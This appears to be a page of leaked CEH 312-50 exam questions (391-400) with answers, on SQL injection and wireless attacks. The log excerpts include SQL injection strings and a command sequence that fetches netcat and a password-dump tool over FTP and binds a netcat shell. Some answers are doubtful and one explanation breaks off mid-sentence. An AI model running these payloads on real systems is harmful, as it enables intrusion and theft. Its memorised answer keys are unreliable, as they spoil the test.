[Free] 2018(Jan) EnsurePass Testking ECCouncil 312-50 Dumps with VCE and PDF 391-400

Ensurepass.com : Ensure you pass the IT Exams
2018 Jan ECCouncil Official New Released 312-50

Ethical Hacking and Countermeasures

Question No: 391 – (Topic 14)

Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu. The bank recently deployed a new Internet-accessible Web application through which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser.

John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet-enabled banking application. Strangely, the account balances of many of the bank’s customers had been changed! However, money hadn’t been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application’s logs and found the following entries:

Attempted login of unknown user: John
Attempted login of unknown user: sysaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete ”;
Attempted login of unknown user: ‘ or 1=1-
Attempted login of unknown user: ‘; drop table logins-
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x90627579944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Transfer Funds user jason
Pay Bill user mike
Logout of user mike

What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer)

  A. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID.

  B. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason’s session.

  C. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools.

  D. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.

Answer: A

Explanation: The following part:

Attempted login of unknown user: pete ”;
Attempted login of unknown user: ‘ or 1=1-
Attempted login of unknown user: ‘; drop table logins-

clearly shows a hacker trying to perform a SQL injection by bypassing the login with the statement 1=1 and then dumping the logins table.

Question No: 392 – (Topic 14)

Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit.

Choose the attack type from the choices given below.

  A. Database Fingerprinting

  B. Database Enumeration

  C. SQL Fingerprinting

  D. SQL Enumeration

Answer: A

Explanation: He is trying to create a view of the characteristics of the target database; he is taking its fingerprints.

Question No: 393 – (Topic 14)

Your boss is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack?

  A. SQL Input attack

  B. SQL Piggybacking attack

  C. SQL Select attack

  D. SQL Injection attack

Answer: D

Explanation: This technique is known as a SQL injection attack.

Question No: 394 – (Topic 14)

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands shown below being run:

“cmd1.exe /c open >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp -s:ftpcom”
“cmd1.exe /c nc -l -p 6969 -e cmd1.exe”

What can you infer from the exploit given?

  A. It is a local exploit where the attacker logs in using username johna2k.

  B. There are two attackers on the system – johna2k and haxedj00.

  C. The attack is a remote exploit and the hacker downloads three files.

  D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

Answer: C

Topic 15, Hacking Wireless Networks

Question No: 395 – (Topic 15)

Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.)

  A. Identifies the wireless network

  B. Acts as a password for network access

  C. Should be left at the factory default setting

  D. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools

Answer: A,B

Question No: 396 – (Topic 15)

Jacob would like your advice on using a wireless hacking tool that can save him time and get him better results with fewer packets. You would like to recommend a tool that uses KoreK's implementation. Which tool would you recommend from the list below?

  A. Kismet

  B. Shmoo

  C. Aircrack

  D. John the Ripper

Answer: C

Explanation: Implementing KoreK's attacks as well as improved FMS, aircrack provides the fastest and most effective statistical attacks available. John the Ripper is a password cracker, Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system, and

Question No: 397 – (Topic 15)

In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this?

  A. WEP attack

  B. Drive by hacking

  C. Rogue access point attack

  D. Unauthorized access point attack

Answer: C

Explanation: The definition of a Rogue access point is:

1. A wireless access point (AP) installed by an employee without the consent of the IT department. Without the proper security configuration, users have exposed their company's network to the outside world.

2. An access point (AP) set up by an attacker outside a facility with a wireless network. Also called an "evil twin," the rogue AP picks up beacons (signals that advertise its presence) from the company's legitimate AP and transmits identical beacons, which some client machines inside the building associate with.

Question No: 398 – (Topic 15)

802.11b is considered a ____ protocol.

  A. Connectionless

  B. Secure

  C. Unsecure

  D. Token ring based

  E. Unreliable

Answer: C

Explanation: 802.11b is an insecure protocol. It has many weaknesses that can be used by a hacker.

Question No: 399 – (Topic 15)

Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called?

  A. Spoof attack

  B. Replay attack

  C. Injection attack

  D. Rebound attack

Answer: B

Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it, possibly as part of a masquerade attack by IP packet substitution (such as stream cipher attack).

Question No: 400 – (Topic 15)

On wireless networks, the SSID is used to identify the network. Why are SSIDs not considered to be a good security mechanism to protect wireless networks?

  A. The SSID is only 32 bits in length.

  B. The SSID is transmitted in clear text.

  C. The SSID is the same as the MAC address for all vendors.

  D. The SSID is to identify a station, not a network.

Answer: B

Explanation: The SSID IS constructed to identify a network, it IS NOT the same as the MAC address, and SSIDs consist of a maximum of 32 alphanumeric characters.
